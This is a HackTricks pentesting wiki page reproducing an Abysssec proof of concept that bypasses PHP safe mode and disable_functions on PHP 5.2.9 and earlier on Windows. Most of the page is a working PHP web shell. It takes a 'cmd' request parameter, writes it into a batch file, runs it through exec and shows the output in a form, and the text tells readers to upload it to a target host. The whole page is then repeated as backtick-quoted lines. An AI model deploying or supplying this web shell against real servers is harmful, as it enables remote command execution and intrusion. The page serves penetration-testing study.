hacktricks/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md

# disable\_functions bypass - PHP &lt;= 5.2.9 on windows

## PHP &lt;= 5.2.9 on windows

From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)

{% tabs %}
{% tab title="exploit.php" %}
```php
<?php
//cmd.php
/*
	Abysssec Inc Public Advisory 
	
	Here is another safemod bypass vulnerability exist in php <= 5.2.9 on windows .
	the problem comes from OS behavior - implement  and interfacing between php
	and operation systems directory structure . the problem is php won't tell difference 
	between directory browsing in linux and windows this can lead attacker to ability 
	execute his / her commands on targert machie even in SafeMod On  (php.ini setting) . 
	=============================================================================
	in linux when you want open a directory for example php directory you need
	to go to /usr/bin/php and you can't use \usr\bin\php . but windows won't tell
	diffence between slash and back slash it means there is no didffrence  between 
	c:\php and c:/php , and this is not vulnerability but itself but  because of this  simple 
	php implement "\" character can escape safemode using  function like excec . 
	here is a PoC for discussed vulnerability . just upload files on your target host and execute
	your commands . 
	==============================================================================
	note : this vulnerabities is just for educational purpose and author will be not be responsible  
	for any damage using this vulnerabilty. 
	==============================================================================
	for more information visit Abysssec.com
	feel free to contact me at admin [at] abysssec.com
*/
	$cmd = $_REQUEST['cmd'];
	if ($cmd){
	$batch = fopen ("cmd.bat","w");
	fwrite($batch,"$cmd>abysssec.txt"."\r\n");
	fwrite($batch,"exit");
	fclose($batch);
	exec("\start cmd.bat");
	echo "<center>";
	echo "<h1>Abysssec.com PHP <= 5.2.9 SafeMod Bypasser</h1>";
	echo "<textarea rows=20 cols=60>";
	require("abysssec.txt");
	echo "</textarea>";
	echo "</center>";
	}
?>

<html>
<body bgcolor=#000000 and text=#DO0000>
<center>
<form method=post>
<input type=text name=cmd >
<input type=submit value=bypass>
</form>
</center>
</body>
</html>
```
{% endtab %}

{% tab title="cmd.bat" %}
```
dir > abyss.txt
exit
```
{% endtab %}
{% endtabs %}
GitBook: [master] 17 pages modified 2020-11-14 18:21:56 +00:00			`# disable\_functions bypass - PHP <= 5.2.9 on windows`

			`## PHP <= 5.2.9 on windows`

			`From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)`

			`{% tabs %}`
			`{% tab title="exploit.php" %}`
			```php
			`<?php`
			`//cmd.php`
			`/*`
			`Abysssec Inc Public Advisory`

			`Here is another safemod bypass vulnerability exist in php <= 5.2.9 on windows .`
			`the problem comes from OS behavior - implement and interfacing between php`
			`and operation systems directory structure . the problem is php won't tell difference`
			`between directory browsing in linux and windows this can lead attacker to ability`
			`execute his / her commands on targert machie even in SafeMod On (php.ini setting) .`
			`=============================================================================`
			`in linux when you want open a directory for example php directory you need`
			`to go to /usr/bin/php and you can't use \usr\bin\php . but windows won't tell`
			`diffence between slash and back slash it means there is no didffrence between`
			`c:\php and c:/php , and this is not vulnerability but itself but because of this simple`
			`php implement "\" character can escape safemode using function like excec .`
			`here is a PoC for discussed vulnerability . just upload files on your target host and execute`
			`your commands .`
			`==============================================================================`
			`note : this vulnerabities is just for educational purpose and author will be not be responsible`
			`for any damage using this vulnerabilty.`
			`==============================================================================`
			`for more information visit Abysssec.com`
			`feel free to contact me at admin [at] abysssec.com`
			`*/`
			`$cmd = $_REQUEST['cmd'];`
			`if ($cmd){`
			`$batch = fopen ("cmd.bat","w");`
			`fwrite($batch,"$cmd>abysssec.txt"."\r\n");`
			`fwrite($batch,"exit");`
			`fclose($batch);`
			`exec("\start cmd.bat");`
			`echo "<center>";`
			`echo "<h1>Abysssec.com PHP <= 5.2.9 SafeMod Bypasser</h1>";`
			`echo "<textarea rows=20 cols=60>";`
			`require("abysssec.txt");`
			`echo "</textarea>";`
			`echo "</center>";`
			`}`
			`?>`

			`<html>`
			`<body bgcolor=#000000 and text=#DO0000>`
			`<center>`
			`<form method=post>`
			`<input type=text name=cmd >`
			`<input type=submit value=bypass>`
			`</form>`
			`</center>`
			`</body>`
			`</html>`
			```
			`{% endtab %}`

			`{% tab title="cmd.bat" %}`
			```
			`dir > abyss.txt`
			`exit`
			```
			`{% endtab %}`
			`{% endtabs %}`